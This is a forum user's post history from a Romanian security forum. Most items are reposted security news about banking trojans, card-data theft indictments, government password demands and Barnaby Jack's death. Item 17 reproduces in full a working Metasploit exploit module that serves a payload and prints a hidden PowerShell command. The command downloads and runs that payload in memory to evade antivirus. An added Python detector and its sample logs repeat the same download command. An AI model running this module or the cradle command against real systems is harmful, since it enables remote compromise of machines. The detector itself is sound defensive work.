Matt

Everything posted by Matt

  1. You're giving ideas to the kids under 16.
  2. The Legend said: 7. Do not ask for VIP, Moderator or other ranks, because you will not receive them. If we need you, we will look for you ourselves.
  3. Top government spy agencies GCHQ and MI5 are backing audits of the cyber security strategies at the UK’s top firms in order to assess their preparedness against the threat of cyber attacks. The agencies have added their support to a letter, sent by the department of Business, Skills and Innovation (BIS), to the UK’s top FTSE 350 firms offering to carry out Cyber Governance Health Checks. However, it is unclear who would carry out the health checks, and what specifically the audit would entail. The letter, a copy of which has been seen by V3, outlines the threats facing firms from cyber attacks and the need to ensure adequate measures are in place to protect data and systems. “The cyber threat is diverse and continues to grow, from those looking to seize commercial advantage and intellectual property to those looking to destroy critical data and undermine the integrity of systems,” it reads. “Cyber attacks against companies are already causing significant damage to personal and organisational reputations and revenues.” As such, the audits are designed as a chance for firms to have their cyber security practices audited and anonymously scrutinised against their peers. This information will then be used to help firms understand where they could improve their strategies. “The Cyber Governance Health Check will provide a free and confidential set of conclusions and a comparison of your business against its peers, helping inform subsequent vulnerability discussions between the company and its external auditor," it adds. "This will better enable you and your board to understand and manage risks that have the potential to cause major damage to your business.” The programme is expected to begin in September and the government is hoping the initiative will lead to increased dialogue between industry and government on how best to tackle the scourge of cyber threats. 
The move comes a day after UK retailer Lakeland revealed it was hit by a sophisticated cyber attack on two of its databases that forced the firm to reset all customer passwords as a precaution. Source: V3.co.uk
  4. Cybercrooks have put on sale a new professional-grade Trojan toolkit called KINS that will pose plenty of problems for banks and their customers in the months and years ahead. KINS promises the ease of use of bank-account-raiding software nasty ZeuS combined with the technical support offered by the team behind Citadel (which withdrew its banking Trojan from sale in December). KINS - which infects Windows PCs at a very low level and snoops on victims' online banking to drain their accounts - therefore seems to be well poised to exploit a gap in the market created by Citadel's absence, according to Limor Kessem, a security researcher at RSA. "The moment Citadel was off the market, the deep-web enclaves, where fraudsters congregate, became awash with fraud-as-a-service deals for Trojan binaries and hosting packages," Kessem explains in an engaging blog post. "During the dry months that had suddenly befallen the lower ranking cyber criminals, a few shady malware developers attempted to make a few bucks by trying to appease them with basic malware and converted HTTP botnets - Trojans that carry out lists of tasks, equipped with a form-grabber - but even the pseudo return of the Carberp Trojan left the underground hungry for more." "The clear and resounding truth was that botmasters have not had to face such a situation since the Limbo Trojan was released in 2005. The ongoing turbulence since the leak of the Zeus code in mid-2011 has not given way to a stable offering in the underground, and it seems that professional cybercrime malware developers are just not what they used to be," she adds. Cybercrooks were even willing to team up to finance a banking Trojan project, Kessem reports. RSA researchers first heard whisperings from the digital underground about a new cybercrime tool called KINS in February; other researchers claim they first saw it in use in 2011. 
But today, after months of rumours, a software vendor in a closed Russian-speaking online forum announced the open sale of the KINS Trojan to the cybercrime community. The Trojan is on offer for $5,000 via the WebMoney digital currency. For now, KINS only targets Microsoft-powered machines outside of Russia. The seller denied all ties to other Trojans but RSA reports the newcomer already shares many of the features of Zeus and SpyEye, the two principal agents of malware-powered bank theft worldwide over recent years. The KINS architecture is built like both Zeus and SpyEye, with a main blob of code and DLL plugins. Crucially, the Trojan toolkit requires no technical skills to use, a pioneering feature of ZeuS. The new cybercrime toolkit also comes with an anti-Rapport plugin that featured in SpyEye, designed to foil Trusteer's widely deployed transaction security tool. It's unclear how effective this technology is in practice. Criminals can manage infected PCs using RDP (the Remote Desktop Protocol), a communications channel previously used by SpyEye. KINS is specifically designed not to infect systems in Russia and the Ukraine by avoiding computers with Russian language keyboard settings, a feature that was first introduced by Citadel in January 2012. The feature offers a way for cybercrooks based in Russia to avoid the attentions of local cops. The unknown KINS developer appears to have learned lessons from his predecessors, according to Kessem. For one thing KINS has been kept well away from Trojan trackers, a problem that plagued SpyEye and ZeuS. Trojan trackers log the command-and-control servers associated with banking Trojan attacks, helping to mitigate the consequences of malware compromises as well as assisting zombie network takedown efforts. KINS is designed to spread using popular exploit packs such as Neutrino. KINS is capable of easily infecting machines running Windows 8 and other x64 operating systems. 
It also embeds itself in computer drives' volume boot records so that it's activated almost as soon as the machines are powered on. That makes infections both more stealthy and harder to eradicate because the malicious code is executed before the operating system proper starts up. "With all other major malware developers choosing to lay low to avoid imminent arrest by law enforcement authorities, KINS' author is very sure to see an immediate demand for his Trojan, so long as he can avoid capture himself and as soon as high-ranking peers sign off on its crime-grade quality," Kessem concluded. "As that happens, anti-fraud teams around the world may be dealing with a new Trojan in the very near future." Source: TheRegister.co.uk
  5. MICROBLOGGING NETWORK Twitter has apologised for taking its users' faces and rolling them into its promotional material. A blog post on the firm's website explains what happened and how bad it feels about it. Twitter says that it created some mock tweets to use in marketing guff without thinking about the fact that there might be a body behind the avatar. "An earlier version of this blog post included an image with mock tweets from real users of our platform," it says. "This was not OK. Once we became aware of this mistake we took it down immediately. We deeply apologize to the three users included in the earlier images." Twitter has named the three users affected. Apparently Twitter had put words in their mouths to say something positive about coffee. One responded saying, "don't do this again", while another questioned how it might have ever happened. Twitter has not revealed how it happened. The trio's images appeared in a blog about some new Twitter marketing business. The Twitter post says that the fake tweets have been removed, but it still has a slide stamped "revised" that clearly shows three different Twitter users gassing about coffee. They are revealed on closer inspection to come from the Twitter marketing department, which makes us wonder why no one thought to use safe, in-house people in the first place. Source: TheInquirer.net
  6. Stolen card data was uploaded to blank cards used by criminals to make cash withdrawals and purchases US prosecutors have launched what they say is the country's largest ever hacking fraud case. Five men in Russia and Ukraine have been charged with running a hacking operation that allegedly stole more than 160 million credit and debit card numbers from a number of major US companies over a period of seven years. Losses from the thefts amounted to hundreds of millions of dollars. Corporate victims included Nasdaq, Visa, Dow Jones and JC Penney. Paul Fishman, US Attorney for the District of New Jersey, called the case "the largest ever hacking and data scheme breach in the United States". Just three of the corporate victims reported $300m (£196m) in losses, prosecutors say. Other victims included Heartland Payment Systems, one of the world's largest credit and debit card payment processing companies; French retailer Carrefour; Dexia Bank Belgium; and 7-Eleven. The indictment identified the defendants as Vladimir Drinkman, Aleksander Kalinin, Roman Kotov and Dmitriy Smilianets, all from Russia, and Mikhail Rytikov, a Ukrainian. All five are charged with taking part in a computer hacking conspiracy and conspiracy to commit wire fraud. Mr Drinkman and Mr Kalinin specialised in penetrating network security and hacking into corporate systems, prosecutors allege, while Mr Kotov specialised in trawling through the data looking for information worth stealing. Mr Rytikov ran the anonymous web-hosting services that enabled the others to carry out their activities, while Mr Smilianets sold on the stolen data and farmed out the proceeds, prosecutors say. "This type of crime is the cutting edge," said Mr Fishman. "Those who have the expertise and the inclination to break into our computer networks threaten our economic well-being, our privacy, and our national security." 
One of the co-conspirators named is Albert Gonzalez, known online as "soupnazi", who was charged along with Mr Kalinin and Mr Drinkman in 2009 and is already serving 20 years for corporate data hacking. Mr Drinkman and Mr Smilianets are both in custody but the other three remain at large. Infiltrated: The attacks often involved identifying weaknesses in Structured Query Language (SQL) databases and uploading malware that gave them access to corporate networks. "Sniffer" software then sought out and collected valuable personal data that the defendants could sell on to other criminals around the world. Credit card numbers were sold for $15 to $50 each, prosecutors say. This stolen data could be transferred to blank cards then used to withdraw cash or make purchases. The prosecutors said the defendants encrypted their communications and managed to disable security systems on corporate networks to prevent detection. Source: BBC.co.uk
  7. Secret demands mark escalation in Internet surveillance by the federal government through gaining access to user passwords, which are typically stored in encrypted form. The U.S. government has demanded that major Internet companies divulge users' stored passwords, according to two industry sources familiar with these orders, which represent an escalation in surveillance techniques that has not previously been disclosed. If the government is able to determine a person's password, which is typically stored in encrypted form, the credential could be used to log in to an account to peruse confidential correspondence or even impersonate the user. Obtaining it also would aid in deciphering encrypted devices in situations where passwords are reused. "I've certainly seen them ask for passwords," said one Internet industry source who spoke on condition of anonymity. "We push back." A second person who has worked at a large Silicon Valley company confirmed that it received legal requests from the federal government for stored passwords. Companies "really heavily scrutinize" these requests, the person said. "There's a lot of 'over my dead body.'" Some of the government orders demand not only a user's password but also the encryption algorithm and the so-called salt, according to a person familiar with the requests. A salt is a random string of letters or numbers used to make it more difficult to reverse the encryption process and determine the original password. Other orders demand the secret question codes often associated with user accounts. A Microsoft spokesperson would not say whether the company has received such requests from the government. But when asked whether Microsoft would divulge passwords, salts, or algorithms, the spokesperson replied: "No, we don't, and we can't see a circumstance in which we would provide it." Google also declined to disclose whether it had received requests for those types of data. 
But a spokesperson said the company has "never" turned over a user's encrypted password, and that it has a legal team that frequently pushes back against requests that are fishing expeditions or are otherwise problematic. "We take the privacy and security of our users very seriously," the spokesperson said. A Yahoo spokeswoman would not say whether the company had received such requests. The spokeswoman said: "If we receive a request from law enforcement for a user's password, we deny such requests on the grounds that they would allow overly broad access to our users' private information. If we are required to provide information, we do so only in the strictest interpretation of what is required by law." Apple, Facebook, AOL, Verizon, AT&T, Time Warner Cable, and Comcast did not respond to queries about whether they have received requests for users' passwords and how they would respond to them. Richard Lovejoy, a director of the Opera Software subsidiary that operates FastMail, said he doesn't recall receiving any such requests but that the company still has a relatively small number of users compared with its larger rivals. Because of that, he said, "we don't get a high volume" of U.S. government demands. The FBI declined to comment. Some details remain unclear, including when the requests began and whether the government demands are always targeted at individuals or seek entire password database dumps. The Patriot Act has been used to demand entire database dumps of phone call logs, and critics have suggested its use is broader. "The authority of the government is essentially limitless" under that law, Sen. Ron Wyden, an Oregon Democrat who serves on the Senate Intelligence committee, said at a Washington event this week. Large Internet companies have resisted the government's requests by arguing that "you don't have the right to operate the account as a person," according to a person familiar with the issue. 
"I don't know what happens when the government goes to smaller providers and demands user passwords," the person said. An attorney who represents Internet companies said he has not fielded government password requests, but "we've certainly had reset requests -- if you have the device in your possession, then a password reset is the easier way." Cracking the codes: Even if the National Security Agency or the FBI successfully obtains an encrypted password, salt, and details about the algorithm used, unearthing a user's original password is hardly guaranteed. The odds of success depend in large part on two factors: the type of algorithm and the complexity of the password. Algorithms, known as hash functions, that are viewed as suitable for scrambling stored passwords are designed to be difficult to reverse. One popular hash function called MD5, for instance, transforms the phrase "National Security Agency" into this string of seemingly random characters: Computer scientists believe that, if a hash function is well-designed, the original phrase cannot be derived from the output. But modern computers, especially ones equipped with high-performance video cards, can test passwords scrambled with MD5 and other well-known hash algorithms at the rate of billions a second. One system using 25 Radeon-powered GPUs that was demonstrated at a conference last December tested 348 billion hashes per second, meaning it would crack a 14-character Windows XP password in six minutes. The best practice among Silicon Valley companies is to adopt far slower hash algorithms -- designed to take a large fraction of a second to scramble a password -- that have been intentionally crafted to make it more difficult and expensive for the NSA and other attackers to test every possible combination. One popular algorithm, used by Twitter and LinkedIn, is called bcrypt. 
A 2009 paper (PDF) by computer scientist Colin Percival estimated that it would cost a mere $4 to crack, in an average of one year, an 8-character bcrypt password composed only of letters. To do it in an average of one day, the hardware cost would jump to approximately $1,500. But if a password of the same length included numbers, asterisks, punctuation marks, and other special characters, the cost-per-year leaps to $130,000. Increasing the length to any 10 characters, Percival estimated in 2009, brings the estimated cracking cost to a staggering $1.2 billion. As computers have become more powerful, the cost of cracking bcrypt passwords has decreased. "I'd say as a rough ballpark, the current cost would be around 1/20th of the numbers I have in my paper," said Percival, who founded a company called Tarsnap Backup, which offers "online backups for the truly paranoid." Percival added that a government agency would likely use ASICs -- application-specific integrated circuits -- for password cracking because it's "the most cost-efficient -- at large scale -- approach." While developing Tarsnap, Percival devised an algorithm called scrypt, which he estimates can make the "cost of a hardware brute-force attack" against a hashed password as much as 4,000 times greater than bcrypt. Bcrypt was introduced (PDF) at a 1999 Usenix conference by Niels Provos, currently a distinguished engineer in Google's infrastructure group, and David Mazières, an associate professor of computer science at Stanford University. With the computers available today, "bcrypt won't pipeline very well in hardware," Mazières said, so it would "still be very expensive to do widespread cracking." Even if "the NSA is asking for access to hashed bcrypt passwords," Mazières said, "that doesn't necessarily mean they are cracking them." 
Easier approaches, he said, include an order to extract them from the server or network when the user logs in -- which has been done before -- or installing a keylogger at the client. Questions of law: Whether the National Security Agency or FBI has the legal authority to demand that an Internet company divulge a hashed password, salt, and algorithm remains murky. "This is one of those unanswered legal questions: Is there any circumstance under which they could get password information?" said Jennifer Granick, director of civil liberties at Stanford University's Center for Internet and Society. "I don't know." Granick said she's not aware of any precedent for an Internet company "to provide passwords, encrypted or otherwise, or password algorithms to the government -- for the government to crack passwords and use them unsupervised." If the password will be used to log in to the account, she said, that's "prospective surveillance," which would require a wiretap order or Foreign Intelligence Surveillance Act order. If the government can subsequently determine the password, "there's a concern that the provider is enabling unauthorized access to the user's account if they do that," Granick said. That could, she said, raise legal issues under the Stored Communications Act and the Computer Fraud and Abuse Act. Orin Kerr, a law professor at George Washington University and a former federal prosecutor, disagrees. First, he said, "impersonating someone is legal" for police to do as long as they do so under court supervision through the Wiretap Act. Second, Kerr said, the possibility that passwords could be used to log into users' accounts is not sufficient legal grounds for a Web provider to refuse to divulge them. "I don't know how it would violate the Wiretap Act to get information lawfully only on the ground that the information might be used to commit a Wiretap violation," he said. 
The Justice Department has argued in court proceedings before that it has broad legal authority to obtain passwords. In 2011, for instance, federal prosecutors sent a grand jury subpoena demanding the password that would unlock files encrypted with the TrueCrypt utility. The Florida man who received the subpoena claimed the Fifth Amendment, which protects his right to avoid self-incrimination, allowed him to refuse the prosecutors' demand. In February 2012, the U.S. Court of Appeals for the Eleventh Circuit agreed, saying that because prosecutors could bring a criminal prosecution against him based on the contents of the decrypted files, the man "could not be compelled to decrypt the drives." In January 2012, a federal district judge in Colorado reached the opposite conclusion, ruling that a criminal defendant could be compelled under the All Writs Act to type in the password that would unlock a Toshiba Satellite laptop. Both of those cases, however, deal with criminal proceedings when the password holder is the target of an investigation -- and don't address when a hashed password is stored on the servers of a company that's an innocent third party. "If you can figure out someone's password, you have the ability to reuse the account," which raises significant privacy concerns, said Seth Schoen, a senior staff technologist at the Electronic Frontier Foundation. Last updated on July 26 at 12 p.m. PT with comments from Orin Kerr. A previous update added comment from Yahoo, which responded after this article was published. Disclosure: McCullagh is married to a Google employee not involved with this issue. Source: News.Cnet.Com
  8. An elite hacker who was due to demonstrate how heart implants could be hacked has died unexpectedly in San Francisco. Barnaby Jack died on Thursday, the city's medical examiner's office told Reuters, but did not give more details. He had been due to give a presentation into medical device vulnerabilities at the Black Hat security conference in Las Vegas taking place next week. He had said one technique could kill a man from 30 feet (nine metres) away. IOActive, the security firm at which Mr Jack was director of embedded devices, said it was preparing a statement. In a tweet, the company said: "Lost but never forgotten our beloved pirate, Barnaby Jack has passed." His sister Amberleigh Jack, who lives in New Zealand, told Reuters news agency he was 35. Mr Jack became one of the most famous hackers on the planet after a 2010 demonstration in which he hacked a cashpoint, making it give out money. The technique was dubbed "Jackpotting". 'Social media flood': More recently, he emerged as a leading expert in the weaknesses that could be found in medical technology. Last year, he told the BBC about how he had discovered flaws in widely-used insulin pumps which allowed him to compromise the devices. The hack made it possible to control them and administer a fatal level of insulin, Mr Jack said. "My purpose was not to allow anyone to be harmed by this because it is not easy to reproduce," he told the BBC during an interview in April 2012. "But hopefully it will promote some change in these companies and get some meaningful security in these devices." Mr Jack's expertise and vivid demonstrations of his knowledge at events like Black Hat earned him the respect of many security professionals. Amberleigh Jack thanked those who have been posting messages of sympathy online. "So humbled by the social media flood of people that loved @barnaby_jack," she tweeted. "Thank you all so much for your kind words." Source: BBC.Co.Uk
  9. Social networking site Pinterest has launched a feature which will track user behaviour while allowing the option for users to opt out of tracking tools. The company said that its new Home Page would seek to provide users with a better-suited experience by serving up pages more suited to user interests. To do so, the site is looking to collect more data on user activities and interests. "If you're interested, we'll also suggest personalized pins and boards based on websites you go to that have the Pin It button," said Pinterest software engineer Ke Chen. "So if you're planning a party and have gone to lots of party sites recently, we'll try to suggest boards to make your event a hit." In rolling out the new feature, Pinterest is also looking to provide privacy controls for users. The company said that it would be adding support for the 'Do Not Track' security platform. The service will allow users to opt out of tracking platforms and automatically disable features which would keep a log of user browsing patterns. Users who opt out of the feature will be able to use the Pinterest service without having their activity logged. The 'Do Not Track' platform has emerged as a preferred tool for privacy activists, though the platform is not without its detractors. The Sans institute has panned the platform for its opt-in nature which requires site administrators to manually add support for the platform and lets administrators continue to track user behaviour. Source: V3.co.uk
  10. SOFTWARE DEVELOPER Mozilla has floated the idea of using Firefox users' web browsing history to deliver personalised content. Mozilla said it has been working on the idea of serving personalised recommendations to Firefox users for a year. The firm is floating the idea that by having the web browser go through the user's web history, with the user sharing those interests with third party websites, then websites can serve content that's of interest to the user. Mozilla product manager Justin Scott said that the organisation has been doing experiments on creating a user personalised web with some volunteer Firefox users who opted-in for the trial. Now the outfit is going one step further, looking at the idea of Firefox users sharing the interests gleaned from analysing their web browsing history with other websites. Scott described what the service could end up doing, "As I browse around the web, I could choose when to share those interests with specific websites for a personalized experience. Those websites could then prioritize articles on the latest gadgets and make hockey scores more visible." He said the analysis of web browser history would be done on the client with no data being sent, unless of course the user then wishes to share their interests with websites. Scott said that Mozilla is still in the experimental stage and is "testing the concept with volunteer participants". He didn't say whether Mozilla is planning on taking the idea beyond the experimental stage, but if it does Mozilla will have work to do to convince users that analysing their web browsing history and sharing it with websites isn't an invasion of privacy. Source: TheInquirer.net
  11. Breaking any victim's account using social engineering | TinKode's Blog Cyber Smart Defence. Breaking a WordPress blog using social engineering | TinKode's Blog Cyber Smart Defence. And guess what: https://rstforums.com/forum/72668-spargerea-oric-rui-cont-al-unei-victime-cu-ajutorul-ingineriei-sociale.rst I don't understand you. What do you want to achieve? You come here and make yourself a fake introduction, saying you're not Romanian, begging everyone here to be made moderator when you already have access to the forum.
  12. US authorities have arrested five men alleged to have carried out the ‘largest ever’ hacking and data breach scheme, which targeted corporate networks at major institutions such as Dow Jones, Carrefour and Nasdaq, and stole data on 160 million credit cards, costing $300m. The arrests were carried out by New Jersey officers in conjunction with the US Secret Service and Department of Justice, in a coordinated case against the alleged attackers. US attorney Paul Fishman cited the scale of the operation as proof cyber crime is a major threat to the economy. “This type of crime is the cutting edge. Those who have the expertise and the inclination to break into our computer networks threaten our economic well-being, our privacy, and our national security,” he said. “This case shows there is a real practical cost because these types of frauds increase the costs of doing business for every American consumer, every day. We cannot be too vigilant and we cannot be too careful.” The five men arrested were all of Russian origin and have been picked up during the past few months at the request of the US and extradited to the country. The accused had numerous roles, such as penetrating network security systems, mining data and providing anonymous web hosting for the attacks. The authorities revealed that the gang used SQL attacks to enter the network, often waiting for many months to gain access by installing malware in their systems to create back-door entry points. The authorities said the defendants used the access to the networks to install ‘sniffer’ programmes to identify, collect and steal data from the victims’ computer networks. The defendants used computers around the world to store the data and sell it on. “In some cases, the defendants lost access to the system due to companies’ security efforts, but were able to regain access through persistent attacks,” the authorities added. 
This helped them take data on 160 million credit cards, at a conservative estimate, which were sold for varying prices, from $10 for each stolen American credit card number and associated data, to $50 for each European credit card number and $15 for each Canadian credit card number. The authorities said this led to losses of at least $300m for the firms targeted, although it is likely to be far higher in reality. Firms targeted included 7-Eleven, Heartland, JetBlue, Euronet, Global Payment and Diners Singapore. The US pledged it would continue to tackle high-end cyber crime and work with authorities around the world to ensure it got its targets. "As is evident by this indictment, the Secret Service will continue to apply innovative techniques to successfully investigate and arrest transnational cyber criminals," said special agent James Mottola of the Newark Field Office. "While the global nature of cyber crime continues to have a profound impact on our financial institutions, this case demonstrates the global investigative steps that US Secret Service Special Agents are taking to ensure that criminals will be pursued and prosecuted no matter where they reside." Source: V3.co.uk
  13. European businesses should be more concerned about local intelligence agencies' data-collection campaigns than the US NSA's PRISM programme, according to ex-Navy Seal and Silent Circle chief executive Mike Janke. Janke told V3 he is surprised media and businesses have taken such a myopic view to the National Security Agency (NSA) PRISM scandal when there is a more pressing, immediate threat on their doorstep. "Every one of them wants to ask about the NSA but if you're in Europe you're surrounded by about 12 NSAs – the Russians, the Chinese, nation states that are using their NSA-level capabilities to hack companies to give their country's economic value a leg up. There's also companies that are hacking other companies, that pay 'consulting firms' to go in and steal intellectual property," he says. The Silent Circle chief said that, given the increased number of threats and attacks targeting businesses, he was actually surprised it took a scandal like PRISM for the uproar to manifest: "All these things have been known entering the 2000s and it became very prevalent with national state hacking in 2007. There's a known understanding of what we call data collection by nation states. Then there's IP theft and criminal hacking for monetary gain and it's been going on for so long that I'm actually surprised it took so long for something like PRISM for it to come to light." PRISM, the data collection campaign run by the NSA, was revealed earlier this year when ex-CIA analyst Edward Snowden leaked documents confirming the NSA had been siphoning user information from Microsoft, Facebook and Google. Following PRISM's exposure, several other intelligence agencies have been accused of mounting similar campaigns. Within the UK the GCHQ has been accused of collecting vast reserves of data by tapping into global telecoms cables, under an operation called Tempora. The operations have led to concerns the world is on the brink of a full-blown cyber cold war. 
Janke downplayed these suggestions, reporting that most military agencies are still playing catch up with intelligence agencies when it comes to cyber: "I found militaries are so dysfunctional and they are always behind the times. They have no understanding that every young 25-year-old has two or three devices they want to use and they've got policies that are 10 years old and only relate to a laptop." "They are aware of the problem but they're so slow to act they'll be hacked for three to four years before reacting thanks to the bureaucracy. We see that in Europe and America, they're really, really slow to move to fix things even though they're aware there are serious issues. They spend a year evaluating a technology, so by the time they pay for it, it's obsolete. Where we see the best is actually in special operations and intelligence agencies. They're always up to speed." Janke believes, despite the seriousness of the revelation, it has helped improve businesses' security awareness in Europe: "It wasn't really until recently that people understood that metadata is so dangerous; that government agencies and criminal organisations can collect your metadata." "We see that Europe has a good level of security-threat awareness in enterprise, but what we don't see is good policy. European companies have weaker corporate policies where they let people bring any device they want, they let them use that device, yet they don't have a very good way of controlling the devices." He adds that the trend is a marked departure from that seen in most US firms: "In America you have good policies but not good security awareness, that's the difference. We definitely find that European companies have weaker policies about how to control the communications going in and out of their offices." Janke's comments mirror the findings of the UK government, which has launched several initiatives designed to help businesses implement more robust security policies. 
Most recently, the UK Home Office launched a new £4m cyber awareness campaign, designed to educate businesses and citizens about the cyber threats facing them. Source: V3.co.uk
  14. Renowned security researcher Barnaby Jack has died unexpectedly under unknown circumstances, one week before he was due to give a talk at the Black Hat security conference. Jack was famous for demoing on stage how ATM cash machines could be hacked at the 2010 Black Hat conference. He was due to retake the stage at Black Hat next week to demonstrate a new hack that could deactivate heart pacemakers from 30 yards away, similar to the fictional attack shown on popular TV show Homeland. Outside of his famous hacks, Jack was known as a skilled bug hunter, with his research covering multiple fields and areas. Jack's death was confirmed by his employer IOActive via Twitter, although no details of how he died were given. Jack's death has resulted in a sea of comments from the security community with numerous ethical hackers and researchers praising his contributions to the field. Sophos technology director James Lyne praised Jack, saying his animated live demonstrations and energy while researching should act as an example to all security researchers. "It is a sad day to learn that Barnaby Jack has passed away," he told V3. "Barnes had a substantial contribution to the field - not least kicking off a mass of interest and research into the less considered devices in security like ATMs. "His demonstrations and research inspired many (and were awesome) and I truly hope that up and coming security professionals continue his work and passion." Other contemporaries like Apple zero-day hunter Charlie Miller and chief research officer at penetration firm Rapid7, HD Moore, expressed their admiration via Twitter. To see Jack's famous ATM hack check out the video below. Source: V3.co.uk
  15. Haha, he even edited it. You're afraid of him, aren't you?
  16. 4. Some categories have their own internal rules. Check whether there is a sticky rules thread before posting in a given category, especially the "CERERI" (requests) category (minimum 10 QUALITY posts), the "AJUTOR" (help) category (minimum 10 QUALITY posts) and the "Bloguri și Bloggeri" (blogs and bloggers) category (minimum 50 QUALITY posts).
  17. Description : This Metasploit module quickly fires up a web server that serves the payload in powershell. The provided command will start powershell and then download and execute the payload. The IEX command can also be extracted to execute directly from powershell. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so is unlikely to trigger AV solutions and will allow to attempt local privilege escalations supplied by meterpreter etc. You could also try your luck with social engineering. Ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
Author : Ben Campbell, Christopher Campbell
Source : Powershell Payload Web Delivery ≈ Packet Storm
Code :
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Powershell Payload Web Delivery',
      'Description' => %q{
        This module quickly fires up a web server that serves the payload in powershell.
        The provided command will start powershell and then download and execute the payload.
        The IEX command can also be extracted to execute directly from powershell.
        The main purpose of this module is to quickly establish a session on a target
        machine when the attacker has to manually type in the command himself, e.g. RDP
        Session, Local Access or maybe Remote Command Exec.
        This attack vector does not write to disk so is unlikely to trigger AV solutions
        and will allow to attempt local privilege escalations supplied by meterpreter etc.
        You could also try your luck with social engineering.
        Ensure the payload architecture matches the target computer or use SYSWOW64
        powershell.exe to execute x86 payloads on x64 machines.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
          'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
        ],
      'References'  =>
        [
          [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
          [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
          [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
        ],
      'Platform'    => 'win',
      'Targets'     =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 19 2013'))
  end

  def on_request_uri(cli, request)
    print_status("Delivering Payload")
    data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
  end

  def primer
    url = get_uri()
    download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
    print_status("Run the following command on the target machine:")
    print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
  end
end
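As an added detection example (not part of the module above or of Metasploit), the Python below flags the download-cradle command line that primer() prints when it shows up in process-creation telemetry; the pipe-delimited log format, the hostnames and the URL are constructed placeholders.

```python
"""Flag PowerShell download-cradle command lines in process-creation logs."""
import re


def _switch(word, minimum):
    """Regex for a PowerShell switch written as any prefix of `word` of at
    least `minimum` characters (PowerShell accepts unambiguous prefixes,
    so -w, -win and -windowstyle are all the same switch)."""
    tail = ""
    for ch in reversed(word[minimum:]):
        tail = f"(?:{re.escape(ch)}{tail})?"
    return "-" + re.escape(word[:minimum]) + tail + r"\b"


INDICATORS = {
    # evasion-style switches from the module's primer(): -w hidden -nop -ep bypass
    "hidden_window": re.compile(_switch("windowstyle", 1) + r"\s+hidden", re.I),
    "no_profile": re.compile(_switch("noprofile", 3), re.I),
    "policy_bypass": re.compile(
        r"(?:-ep|" + _switch("executionpolicy", 2) + r")\s+(?:bypass|unrestricted)", re.I),
    # in-memory execution of text that was fetched at runtime
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    # remote-fetch primitives
    "remote_fetch": re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod",
        re.I),
}


def classify(cmdline):
    """Return the set of indicator names present in one command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmdline)}


def is_download_cradle(cmdline):
    """True when the line fetches remote content and either executes it in
    memory or runs under two or more of the evasion switches."""
    found = classify(cmdline)
    if "remote_fetch" not in found:
        return False
    evasion = found & {"hidden_window", "no_profile", "policy_bypass"}
    return "in_memory_exec" in found or len(evasion) >= 2


def scan_process_log(lines):
    """Parse constructed 'timestamp|host|image|cmdline' records and return
    (timestamp, host, sorted indicators) for each flagged PowerShell start."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ts, host, image, cmdline = line.split("|", 3)
        if image.lower().endswith("powershell.exe") and is_download_cradle(cmdline):
            hits.append((ts, host, sorted(classify(cmdline))))
    return hits


# Constructed sample events (not real telemetry); hosts and URLs are placeholders.
SAMPLE_LOG = """\
2013-07-26T10:01:02Z|WS01|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://192.0.2.10:8080/'))"
2013-07-26T10:02:15Z|WS02|C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -NoProfile -WindowStyle Hidden -Command "(New-Object Net.WebClient).DownloadFile('http://192.0.2.10/a.exe','C:\\Users\\Public\\a.exe')"
2013-07-26T10:03:40Z|WS03|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1
2013-07-26T10:04:05Z|WS04|C:\\Windows\\System32\\cmd.exe|cmd.exe /c echo IEX
""".splitlines()

if __name__ == "__main__":
    for ts, host, indicators in scan_process_log(SAMPLE_LOG):
        print(ts, host, ", ".join(indicators))
```

The WS03 line (a signed backup script run with -ExecutionPolicy Bypass) is deliberately left unflagged: a policy bypass alone is common in administration and only becomes interesting together with a remote fetch.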
  18. Description : Alienvault OSSIM versions prior to 4.3.0 suffer from multiple reflective cross site scripting vulnerabilities.
Author : xistence
Source : Alienvault OSSIM Cross Site Scripting ≈ Packet Storm
Code :
# Title: Alienvault OSSIM Open Source SIEM 4.2.3 Multiple Reflected XSS Vulnerabilities
# Date: July 25, 2013
# Author: xistence ( xistence[@]0x90[.]nl )
# Vendor: AlienVault
# Vendor URL: http://www.alienvault.com
# Reported: June 24, 2013
# Fix: Upgrade to version 4.3.0

Timeline:
---------
24 Jun 2013: Vulnerability Reported to AlienVault
25 Jul 2013: Still no Vendor response.
xx Jul 2013: Vendor has released version 4.3.0. Version 4.3.0 is not vulnerable to these vulnerabilities, probably fixed by vendor.
25 Jul 2013: Public Disclosure

Vendor Description:
